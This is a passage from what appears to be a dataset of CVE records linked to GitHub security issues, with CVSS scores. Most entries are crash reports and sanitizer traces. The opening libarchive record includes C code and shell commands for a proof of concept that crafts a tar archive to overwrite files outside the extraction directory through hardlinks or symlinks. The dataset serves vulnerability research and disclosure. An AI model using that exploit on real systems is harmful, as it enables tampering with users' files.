larchive $ echo hello > /tmp/target $ echo goodbye > data $ ./vuln4 x.tar data p PATHTAG $ tar tvf x.tar rwxrwxrw NUMBERTAG Jan NUMBERTAG p link to PATHTAG $ tar xvf x.tar x p $ cat /tmp/target goodbye The code could be rewritten to use symlinks instead of dot dot paths: $ cd /tmp/cage $ ls vuln4 vuln4.c $ echo hello > /tmp/target $ echo goodbye > data $ ln s /tmp/target sym $ ./vuln4 x.tar data p sym $ tar tvf x.tar rwxrwxrw NUMBERTAG Jan NUMBERTAG p link to sym $ tar xvf x.tar x p $ cat /tmp/target goodbye APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG include APITAG static void make_archive(char , char , char , char ); static void patch_archive(char , char ); static void make_archive(char archive, char file, char pathname, char linkname) { int fd; ssize_t len; char buf NUMBERTAG struct stat s; struct archive a; struct archive_entry ae; a = APITAG APITAG APITAG archive); ae = APITAG APITAG pathname); / dummy file type AE_SET_HARDLINK has priority anyway / APITAG AE_IFREG); stat(file, &s); archive_entry_set_size(ae, s.st_size); archive_entry_set_uid(ae NUMBERTAG archive_entry_set_gid(ae NUMBERTAG archive_entry_set_perm(ae NUMBERTAG libarchive allows _extraction_ of hardlink payloads, as per the POSIX specs for pax, but not without some arm twisting. We set ctime to force the addition of a pax extended header so that libarchive doesn't zero the size field during _extraction_. libarchive disallows _creation_ of hardlink payloads for all supported tar formats (pax, ustar, gnutar NUMBERTAG tar). If we set the hardlink, libarchive will zero the size field during _creation_, so we simply create a regular file entry and patch the archive on disk via APITAG when done. / archive_entry_set_ctime(ae NUMBERTAG APITAG linkname); / archive_write_header(a, ae); fd = open(file, O_RDONLY); while ((len = read(fd, buf, sizeof buf NUMBERTAG archive_write_data(a, buf, (size_t)len); close(fd); archive_entry_free(ae); archive_write_close(a); archive_write_free(a); patch_archive(archive, linkname); } static void patch_archive(char archive, char linkname) { / extended header + extended body + checksum offset / static const long patch_offset NUMBERTAG FILE fp; unsigned char cp; unsigned long checksum; fp = fopen(archive, \"r+b\"); fseek(fp, patch_offset, SEEK_SET); fscanf(fp, \"%lo\", &checksum); / entry type NUMBERTAG checksum NUMBERTAG cp = (unsigned char )linkname; / linkname char NUMBERTAG while ( cp) checksum += cp++; fseek(fp, patch_offset, SEEK_SET); fprintf(fp NUMBERTAG lo%c NUMBERTAG s\", checksum NUMBERTAG linkname); fclose(fp); } int main(int argc, char APITAG { if (argc NUMBERTAG fprintf(stderr, APITAG %s archive file pathname linkname \", arg NUMBERTAG fprintf(stderr, \" archive output malicious archive here \"); fprintf(stderr, \" file file containing overwrite data \"); fprintf(stderr, \" pathname archive entry pathname \"); fprintf(stderr, \" linkname archive entry linkname \"); fprintf(stderr, \" [can use ../ in linkname] \"); return EXIT_FAILURE; } make_archive(arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG return NUMBERTAG APITAG APITAG POSIX requires that hard links point at only extracted items, though the possibility that a hard link can use a previously extracted symlink as a target and escape the extraction directory should be borne in mind. It seems a good idea to excise the data payload functionality, which is not a mandatory POSIX feature and which does not seem to be widely supported anyway. Look for the lines beginning } else if (r NUMBERTAG a >filesize NUMBERTAG in APITAG in APITAG",
  2622. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  2623. "severity": "HIGH",
  2624. "baseScore": 7.5,
  2625. "impactScore": 3.6,
  2626. "exploitabilityScore": 3.9
  2627. },
  2628. {
  2629. "CVE_ID": "CVE-2016-5727",
  2630. "Issue_Url_old": "https://github.com/SimpleMachines/SMF2.1/issues/3522",
  2631. "Issue_Url_new": "https://github.com/simplemachines/smf/issues/3522",
  2632. "Repo_new": "simplemachines/smf",
  2633. "Issue_Created_At": "2016-07-12T15:01:28Z",
  2634. "description": "Fix CVETAG PHP Object Injection Vulnerability. MENTIONTAG can you verify whether or not this was fixed with this commit: URLTAG per URLTAG",
  2635. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2636. "severity": "HIGH",
  2637. "baseScore": 8.8,
  2638. "impactScore": 5.9,
  2639. "exploitabilityScore": 2.8
  2640. },
  2641. {
  2642. "CVE_ID": "CVE-2016-5824",
  2643. "Issue_Url_old": "https://github.com/libical/libical/issues/286",
  2644. "Issue_Url_new": "https://github.com/libical/libical/issues/286",
  2645. "Repo_new": "libical/libical",
  2646. "Issue_Created_At": "2017-01-20T11:39:03Z",
  2647. "description": "CVETAG : use after free issues. MENTIONTAG has been fuzzing libical last year and found some issues, he reported them first in NUMBERTAG but closed the ticket when he opened the same ticket against thunderbird in the hope to get more answers: CVETAG Also lacking any positive answer there, he published all his fuzzing results here: URLTAG At this point it's not clear whether those issues have been fixed in libical and if they have, it would be nice to know which commit fixed them. This is the point of this ticket. A CVE number has been assigned to those issues: URLTAG (CVE assignment here: URLTAG",
  2648. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2649. "severity": "MEDIUM",
  2650. "baseScore": 5.5,
  2651. "impactScore": 3.6,
  2652. "exploitabilityScore": 1.8
  2653. },
  2654. {
  2655. "CVE_ID": "CVE-2016-5824",
  2656. "Issue_Url_old": "https://github.com/libical/libical/issues/251",
  2657. "Issue_Url_new": "https://github.com/libical/libical/issues/251",
  2658. "Repo_new": "libical/libical",
  2659. "Issue_Created_At": "2016-12-02T14:33:52Z",
  2660. "description": "A heap buffer overflow in icaltime_from_string. Hello, we recently found a memmory issue parsing and executing fuzzed ical file in last revision of libical ( APITAG We tested this issue on Ubuntu NUMBERTAG but other configurations could be affected. Technical details about the issue are: ERRORTAG gdb backtrace is as follows: ERRORTAG This issue was found using APITAG the file to reproduce it is FILETAG . Regards.",
  2661. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2662. "severity": "MEDIUM",
  2663. "baseScore": 5.5,
  2664. "impactScore": 3.6,
  2665. "exploitabilityScore": 1.8
  2666. },
  2667. {
  2668. "CVE_ID": "CVE-2016-5824",
  2669. "Issue_Url_old": "https://github.com/libical/libical/issues/235",
  2670. "Issue_Url_new": "https://github.com/libical/libical/issues/235",
  2671. "Repo_new": "libical/libical",
  2672. "Issue_Created_At": "2016-05-22T19:42:45Z",
  2673. "description": "Potentially security sensitive crashes, best way to get them to you?. Hello, I have been fuzzing libical for a while, I have a handful of use after frees (might be all the same root bug) I would like to provide, but these are potentially security sensitive and not appropriate for a github comment. An example asan trace (tested against NUMBERTAG and master from NUMBERTAG minutes ago): ERRORTAG What's the best way to get the test cases to reproduce the issues to you? My email is bperry. EMAILTAG if you would like to hit me up directly at your convenience.",
  2674. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2675. "severity": "MEDIUM",
  2676. "baseScore": 5.5,
  2677. "impactScore": 3.6,
  2678. "exploitabilityScore": 1.8
  2679. },
  2680. {
  2681. "CVE_ID": "CVE-2016-5844",
  2682. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/717",
  2683. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/717",
  2684. "Repo_new": "libarchive/libarchive",
  2685. "Issue_Created_At": "2016-06-18T09:18:16Z",
  2686. "description": "signed integer overflow in iso parser. The attached malformed iso file (packed as zip, because github limits attachment file types) will cause a signed integer overflow when passed to \"bsdtar tf FILETAG",
  2687. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2688. "severity": "MEDIUM",
  2689. "baseScore": 6.5,
  2690. "impactScore": 3.6,
  2691. "exploitabilityScore": 2.8
  2692. },
  2693. {
  2694. "CVE_ID": "CVE-2016-6132",
  2695. "Issue_Url_old": "https://github.com/libgd/libgd/issues/247",
  2696. "Issue_Url_new": "https://github.com/libgd/libgd/issues/247",
  2697. "Repo_new": "libgd/libgd",
  2698. "Issue_Created_At": "2016-06-30T13:33:42Z",
  2699. "description": "A read out of bands was found in the parsing of TGA files. Hi, A read out of bands was found in the parsing of TGA files using the last revision of libgd APITAG Find FILETAG to reproduce it. The ASAN report is here: ERRORTAG (it is not related with bug NUMBERTAG i just re used the test case to read an arbitrary TGA file) This issue was found using APITAG Regards, Gustavo.",
  2700. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2701. "severity": "MEDIUM",
  2702. "baseScore": 6.5,
  2703. "impactScore": 3.6,
  2704. "exploitabilityScore": 2.8
  2705. },
  2706. {
  2707. "CVE_ID": "CVE-2016-6136",
  2708. "Issue_Url_old": "https://github.com/linux-audit/audit-kernel/issues/18",
  2709. "Issue_Url_new": "https://github.com/linux-audit/audit-kernel/issues/18",
  2710. "Repo_new": "linux-audit/audit-kernel",
  2711. "Issue_Created_At": "2016-06-27T21:44:05Z",
  2712. "description": "BUG: fix double fetch in APITAG See the mailing list thread below for information: FILETAG Taken from the original report: > In function APITAG the whole argument is fetched from user space twice via APITAG In the first loop, it is firstly fetched (line NUMBERTAG to verify, aka looking for non ascii chars. While in the second loop, the whole argument is fetched again (line NUMBERTAG from user space and used at line NUMBERTAG and line NUMBERTAG respectively depends on the previous verification.",
  2713. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
  2714. "severity": "MEDIUM",
  2715. "baseScore": 4.7,
  2716. "impactScore": 3.6,
  2717. "exploitabilityScore": 1.0
  2718. },
  2719. {
  2720. "CVE_ID": "CVE-2016-6160",
  2721. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/251",
  2722. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/251",
  2723. "Repo_new": "appneta/tcpreplay",
  2724. "Issue_Created_At": "2016-07-06T15:52:58Z",
  2725. "description": "Seg Fault on illegal frame size NUMBERTAG From CVETAG ERRORTAG",
  2726. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2727. "severity": "HIGH",
  2728. "baseScore": 7.5,
  2729. "impactScore": 3.6,
  2730. "exploitabilityScore": 3.9
  2731. },
  2732. {
  2733. "CVE_ID": "CVE-2016-6161",
  2734. "Issue_Url_old": "https://github.com/libgd/libgd/issues/209",
  2735. "Issue_Url_new": "https://github.com/libgd/libgd/issues/209",
  2736. "Repo_new": "libgd/libgd",
  2737. "Issue_Created_At": "2016-05-08T12:06:28Z",
  2738. "description": "global out of bounds read when encoding gif from malformed input with gd2togif. The attached file causes a global out of bounds read error in the function output (gd_gif_out.c), called by APITAG This was found with the help of american fuzzy lop and address sanitizer. To test pass the attached file (zip packed due to github limitations) to gd2togif compiled with address sanitizer. The full address sanitizer error message NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG e4b0 at pc NUMBERTAG bp NUMBERTAG ffc8a6e NUMBERTAG sp NUMBERTAG ffc8a6e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e4b0 thread T NUMBERTAG in output PATHTAG NUMBERTAG fb4a in compress PATHTAG NUMBERTAG b NUMBERTAG a in APITAG PATHTAG NUMBERTAG b NUMBERTAG a in APITAG PATHTAG NUMBERTAG bb NUMBERTAG in APITAG PATHTAG NUMBERTAG f3cc6 in main PATHTAG NUMBERTAG f2ab NUMBERTAG b NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG fa8 in _start ( PATHTAG NUMBERTAG e4b0 is located NUMBERTAG bytes to the left of global variable 'masks' defined in APITAG NUMBERTAG e4c0) of size NUMBERTAG e4b0 is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in APITAG NUMBERTAG e NUMBERTAG of size NUMBERTAG string literal>' is ascii string 'GIF NUMBERTAG a' SUMMARY: APITAG global buffer overflow PATHTAG in output Shadow bytes around the buggy address NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG a3c NUMBERTAG f9 f9 f9 f9 f9 FILETAG",
  2739. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2740. "severity": "MEDIUM",
  2741. "baseScore": 6.5,
  2742. "impactScore": 3.6,
  2743. "exploitabilityScore": 2.8
  2744. },
  2745. {
  2746. "CVE_ID": "CVE-2016-6172",
  2747. "Issue_Url_old": "https://github.com/PowerDNS/pdns/issues/4128",
  2748. "Issue_Url_new": "https://github.com/powerdns/pdns/issues/4128",
  2749. "Repo_new": "powerdns/pdns",
  2750. "Issue_Created_At": "2016-07-07T07:17:16Z",
  2751. "description": "xfer size issue. URLTAG",
  2752. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:H",
  2753. "severity": "MEDIUM",
  2754. "baseScore": 6.8,
  2755. "impactScore": 4.0,
  2756. "exploitabilityScore": 2.2
  2757. },
  2758. {
  2759. "CVE_ID": "CVE-2016-6234",
  2760. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/26",
  2761. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/26",
  2762. "Repo_new": "dropbox/lepton",
  2763. "Issue_Created_At": "2016-07-17T00:55:27Z",
  2764. "description": "Some memory corruptions in lepton. Hi, I at this url you can download some samples that will cause memory corruption problems in lepton: URLTAG you can reproduce with PATHTAG singlethread unjailed preload APITAG /tmp/out.lep NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG decode error in scan0 / mcu2TS_MAIN NUMBERTAG TS_MODEL_INIT_BEGIN NUMBERTAG TS_MODEL_INIT NUMBERTAG TS_READ_STARTED NUMBERTAG TS_READ_FINISHED NUMBERTAG TS_JPEG_DECODE_STARTED NUMBERTAG TS_JPEG_DECODE_FINISHED NUMBERTAG TS_DONE NUMBERTAG bytes needed to decompress this file ::::BILL:::: APITAG NUMBERTAG ERROR: APITAG unknown crash on address NUMBERTAG cb NUMBERTAG at pc NUMBERTAG eb NUMBERTAG bp NUMBERTAG ffd0cfd NUMBERTAG sp NUMBERTAG ffd0cfd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG cb NUMBERTAG thread T NUMBERTAG eb NUMBERTAG in std::__atomic_base<unsigned int>::load(std::memory_order) const PATHTAG NUMBERTAG eb NUMBERTAG in std::__atomic_base<unsigned int>::operator unsigned APITAG const PATHTAG NUMBERTAG eb NUMBERTAG in print_bill(int) PATHTAG NUMBERTAG b7f3 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG effabc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG cb NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'billing_map' defined in PATHTAG NUMBERTAG cafc0) of size NUMBERTAG SUMMARY: APITAG unknown crash PATHTAG in std::__atomic_base<unsigned int>::load(std::memory_order) const Shadow bytes around the buggy address NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG cec NUMBERTAG pc NUMBERTAG bp NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG cfc1c0 T NUMBERTAG in setup_imginfo_jpg(bool) PATHTAG NUMBERTAG f in bool APITAG int, unsigned int>, APITAG int, unsigned int> > > , ibytestream ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG d8af in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG da5d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in setup_imginfo_jpg(bool NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c9f NUMBERTAG at pc NUMBERTAG f1 bp NUMBERTAG ffeecdd5e NUMBERTAG sp NUMBERTAG ffeecdd5e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c9f NUMBERTAG thread T NUMBERTAG f0 in setup_imginfo_jpg(bool) PATHTAG NUMBERTAG f in bool APITAG int, unsigned int>, APITAG int, unsigned int> > > , ibytestream ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG d8af in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG c9f NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'read_done' defined in PATHTAG NUMBERTAG c9f NUMBERTAG of size NUMBERTAG c9f NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'overall_start' defined in PATHTAG NUMBERTAG c9ee0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in setup_imginfo_jpg(bool) Shadow bytes around the buggy address NUMBERTAG a NUMBERTAG b NUMBERTAG c NUMBERTAG d0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG e0:[f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c7c NUMBERTAG at pc NUMBERTAG d bp NUMBERTAG fff NUMBERTAG sp NUMBERTAG fff NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c7c NUMBERTAG thread T NUMBERTAG c in build_huffcodes(unsigned char , unsigned char , APITAG , APITAG ) PATHTAG NUMBERTAG c in parse_jfif_jpg(unsigned char, unsigned int, unsigned char ) PATHTAG NUMBERTAG ffd0 in APITAG int, unsigned int>, APITAG int, unsigned int> > > const&, APITAG APITAG > ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG ccc8 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG c7c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'hcodes' defined in PATHTAG NUMBERTAG c7c NUMBERTAG of size NUMBERTAG c7c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'htrees' defined in PATHTAG NUMBERTAG c5c NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in build_huffcodes(unsigned char , unsigned char , APITAG , APITAG ) Shadow bytes around the buggy address NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f9[f9]f9 f NUMBERTAG f NUMBERTAG fa NUMBERTAG fb NUMBERTAG fc NUMBERTAG fd NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG cad0a at pc NUMBERTAG fe NUMBERTAG bp NUMBERTAG fff NUMBERTAG d NUMBERTAG b0 sp NUMBERTAG fff NUMBERTAG d NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG cad0a thread T NUMBERTAG fe NUMBERTAG in APITAG unsigned short const ) PATHTAG NUMBERTAG fe NUMBERTAG in APITAG const , APITAG , APITAG const , unsigned int) PATHTAG NUMBERTAG b3a8 in APITAG APITAG >, std::vector<unsigned char, APITAG char> > ) PATHTAG NUMBERTAG b4ee in bool APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > )>::__call<bool NUMBERTAG ul NUMBERTAG ul>(std::tuple APITAG &&, APITAG NUMBERTAG ul>) PATHTAG NUMBERTAG b4ee in bool APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG PATHTAG NUMBERTAG b4ee in APITAG (), APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > )> APITAG const&) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG ceb5 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG fe3fb5cd NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG cad0a is located NUMBERTAG bytes to the left of global variable 'chroma_debug_height' defined in PATHTAG NUMBERTAG cad NUMBERTAG of size NUMBERTAG cad0a is located NUMBERTAG bytes to the right of global variable 'raw_decoded_fp_Y' defined in PATHTAG NUMBERTAG cad NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in APITAG unsigned short const ) Shadow bytes around the buggy address NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG a NUMBERTAG f9]f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ Thank you Marco",
  2765. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2766. "severity": "MEDIUM",
  2767. "baseScore": 5.5,
  2768. "impactScore": 3.6,
  2769. "exploitabilityScore": 1.8
  2770. },
  2771. {
  2772. "CVE_ID": "CVE-2016-6250",
  2773. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/711",
  2774. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/711",
  2775. "Repo_new": "libarchive/libarchive",
  2776. "Issue_Created_At": "2016-05-28T18:49:50Z",
  2777. "description": "Integer overflow checking filename size for ISO NUMBERTAG Reported by: Christian Wressnegger, Alwin Maier, and Fabian Yamaguchi The ISO NUMBERTAG writer is subject to integer overflows when verifying the filename size. This can lead to a crash when writing ISO NUMBERTAG images with NUMBERTAG GB or NUMBERTAG GB filenames.",
  2778. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  2779. "severity": "HIGH",
  2780. "baseScore": 8.6,
  2781. "impactScore": 4.7,
  2782. "exploitabilityScore": 3.9
  2783. },
  2784. {
  2785. "CVE_ID": "CVE-2016-6252",
  2786. "Issue_Url_old": "https://github.com/shadow-maint/shadow/issues/27",
  2787. "Issue_Url_new": "https://github.com/shadow-maint/shadow/issues/27",
  2788. "Repo_new": "shadow-maint/shadow",
  2789. "Issue_Created_At": "2016-07-24T14:55:21Z",
  2790. "description": "Incorrect integer handling CVETAG . Reported to APITAG bug tracker with proposed fix. CVETAG",
  2791. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  2792. "severity": "HIGH",
  2793. "baseScore": 7.8,
  2794. "impactScore": 5.9,
  2795. "exploitabilityScore": 1.8
  2796. },
  2797. {
  2798. "CVE_ID": "CVE-2016-6298",
  2799. "Issue_Url_old": "https://github.com/latchset/jwcrypto/issues/65",
  2800. "Issue_Url_new": "https://github.com/latchset/jwcrypto/issues/65",
  2801. "Repo_new": "latchset/jwcrypto",
  2802. "Issue_Created_At": "2016-08-31T02:34:07Z",
  2803. "description": "CVETAG : Million Messages Attack vulnerability. The jwcrypto implementation of the RSA NUMBERTAG algorithm is vulnerable to the Million Message Attack described in FILETAG . A timing attack can be leveraged against the implementation to detect when a chosed ciphertext generates a valid header and padding because invalid headr/padding generates a code exception and cryptographic operations are terminated earlier resulting in measurably faster processing over the network. Many thanks to Dennis Detering APITAG for discovering and reporting this vulnerability.",
  2804. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  2805. "severity": "MEDIUM",
  2806. "baseScore": 5.3,
  2807. "impactScore": 3.6,
  2808. "exploitabilityScore": 1.6
  2809. },
  2810. {
  2811. "CVE_ID": "CVE-2016-6305",
  2812. "Issue_Url_old": "https://github.com/openssl/openssl/issues/1563",
  2813. "Issue_Url_new": "https://github.com/openssl/openssl/issues/1563",
  2814. "Repo_new": "openssl/openssl",
  2815. "Issue_Created_At": "2016-09-10T17:12:28Z",
  2816. "description": "APITAG NUMBERTAG hangs (CPU pegged) when SSL_peek is used with TLS NUMBERTAG Code to reproduce: ERRORTAG Reproduces NUMBERTAG reliably for me. Switching APITAG to APITAG fixes it, and switching APITAG to APITAG or APITAG also fixes it. Therefore I believe, but have not confirmed, that URLTAG is the loop that's spinning. Demonstration of what this looke like: ERRORTAG",
  2817. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2818. "severity": "HIGH",
  2819. "baseScore": 7.5,
  2820. "impactScore": 3.6,
  2821. "exploitabilityScore": 3.9
  2822. },
  2823. {
  2824. "CVE_ID": "CVE-2016-6521",
  2825. "Issue_Url_old": "https://github.com/sheehan/grails-console/issues/55",
  2826. "Issue_Url_new": "https://github.com/sheehan/grails-console/issues/55",
  2827. "Repo_new": "sheehan/grails-console",
  2828. "Issue_Created_At": "2016-08-03T21:00:17Z",
